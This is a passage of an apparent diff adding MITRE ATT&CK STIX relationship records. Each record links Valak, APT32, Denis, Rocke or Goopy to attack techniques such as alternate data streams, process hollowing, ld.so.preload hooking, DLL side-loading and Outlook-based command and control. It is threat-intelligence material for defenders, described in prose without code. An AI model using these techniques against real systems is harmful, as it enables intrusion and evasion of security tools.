+ "modified": "2020-06-19T19:08:40.387Z",
+ "created": "2020-06-19T19:08:40.387Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability save and execute files as alternate data streams (ADS).(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1fdd4a0b-fe6d-4fb1-a6ab-7f5063b6ecc3",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.357Z",
+ "created": "2020-06-19T19:08:40.392Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has used regsvr32.exe to launch malicious DLLs.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2bdaa624-15bb-4a69-8192-adc9fa44af3f",
+ "type": "relationship",
+ "modified": "2020-06-22T23:51:06.788Z",
+ "created": "2020-06-19T19:08:40.394Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate running processes on a compromised host.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1ca28941-562d-45e4-946c-518a2015c0dd",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.390Z",
+ "created": "2020-06-19T19:08:40.390Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) can determine if a compromised host has security products installed.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--49c5bbcf-7ac3-406f-8b58-2b4c00b2c41e",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.398Z",
+ "created": "2020-06-19T19:08:40.398Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate local admin accounts.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d670ddce-d32a-4165-a56e-5bb183f4c904",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.354Z",
+ "created": "2020-06-19T19:08:40.400Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) can gather information regarding the user.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5c46f9a0-fb83-473d-af9a-c1c98cfdd85b",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.409Z",
+ "created": "2020-06-19T19:08:40.409Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has been executed via Microsoft Word documents containing malicious macros.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--51656ee5-4d21-42c9-9719-826645b3508f",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.407Z",
+ "created": "2020-06-19T19:08:40.407Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has the ability to modify the Registry key HKCU\\Software\\ApplicationContainer\\Appsw64 to store information regarding the C2 server and downloads.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0841cd91-1151-411f-befc-0204e3a3eb30",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.402Z",
+ "created": "2020-06-19T19:08:40.402Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b91de2c3-897a-4e04-94f8-9e905564b47a",
+ "type": "relationship",
+ "modified": "2020-06-19T19:08:40.413Z",
+ "created": "2020-06-19T19:08:40.413Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) has downloaded a variety of modules and payloads to the compromised host, including IcedID and [Ursnif](https://attack.mitre.org/software/S0386).(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3bae8349-dec3-4780-89aa-7ebbf1c2d44b",
+ "type": "relationship",
+ "modified": "2020-06-22T23:46:45.352Z",
+ "created": "2020-06-19T19:08:40.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has deployed tools after moving laterally using administrative accounts.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--1ecf4ac9-faad-4d2d-9a01-2618a7a54806",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.131Z",
+ "created": "2020-06-19T20:04:12.131Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) used the net view command to show all shares available, including the administrative shares such as C$ and ADMIN$.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--3c3f5cdb-f2cd-4bab-8196-26f160b38a5e",
+ "type": "relationship",
+ "modified": "2020-06-29T16:54:26.406Z",
+ "created": "2020-06-19T20:04:12.134Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--749fb1ed-d73c-4317-8c0f-6c059cff094f",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.136Z",
+ "created": "2020-06-19T20:04:12.136Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) malware has injected a Cobalt Strike beacon into Rundll32.exe.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--36af6d80-fef4-40b9-9b32-a2947eadd9e7",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.179Z",
+ "created": "2020-06-19T20:04:12.179Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--788a6ca2-60ac-4f36-b708-c3a57f087b2b",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.189Z",
+ "created": "2020-06-19T20:04:12.189Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has disguised a Cobalt Strike beacon as a Flash Installer.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--0d7c99f4-b1af-4278-b8bf-3bb04cce166d",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.191Z",
+ "created": "2020-06-19T20:04:12.191Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Denis](https://attack.mitre.org/software/S0354) used the IsDebuggerPresent, OutputDebugString, and SetLastError APIs to avoid debugging. [Denis](https://attack.mitre.org/software/S0354) used GetProcAddress and LoadLibrary to dynamically resolve APIs. [Denis](https://attack.mitre.org/software/S0354) also used the Wow64SetThreadContext API as part of a process hollowing process.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a51caaf6-3b9d-4953-9850-bf9217877644",
+ "type": "relationship",
+ "modified": "2020-06-26T14:33:49.436Z",
+ "created": "2020-06-19T20:39:21.788Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Denis](https://attack.mitre.org/software/S0354) ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--081e43bc-3f9e-4110-a1c1-db7396e2ff59",
+ "type": "relationship",
+ "modified": "2020-06-26T14:33:49.440Z",
+ "created": "2020-06-19T20:39:21.802Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
+ "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Denis](https://attack.mitre.org/software/S0354) replaces the nonexistent Windows DLL \"msfte.dll\" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--70ed2026-90af-4236-8180-2c095bbce0fe",
+ "type": "relationship",
+ "modified": "2020-06-19T20:39:21.805Z",
+ "created": "2020-06-19T20:39:21.805Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Denis](https://attack.mitre.org/software/S0354) has a version written in PowerShell.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ad825dd4-a26c-4468-8c11-91124ef9042d",
+ "type": "relationship",
+ "modified": "2020-06-19T20:39:21.857Z",
+ "created": "2020-06-19T20:39:21.857Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2107aab0-0191-46d1-abec-8d98ac916c21",
+ "type": "relationship",
+ "modified": "2020-06-19T20:41:21.297Z",
+ "created": "2020-06-19T20:41:21.297Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate documents from infected systems.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--bd2312fb-51ff-4766-a24f-1f5911457bc6",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.865Z",
+ "created": "2020-06-19T21:25:43.583Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7d1e24d5-1405-4ade-a4f3-ddb946b46783",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.900Z",
+ "created": "2020-06-19T21:25:43.591Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to delete emails used for C2 once the content has been copied.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--33e32e0a-571a-4eab-9ee4-dfe5747c3a72",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.910Z",
+ "created": "2020-06-19T21:25:43.593Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c81124ac-5df7-4443-9760-95208d19e599",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.943Z",
+ "created": "2020-06-19T21:25:43.656Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has had null characters padded in its malicious DLL payload.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--fb5fc8e3-2dd8-49de-bd9a-ee19c2f7ef7f",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.942Z",
+ "created": "2020-06-19T21:25:43.661Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--cbf9284f-2f47-4d1f-b708-861b0e1e85b5",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.984Z",
+ "created": "2020-06-19T21:25:43.678Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
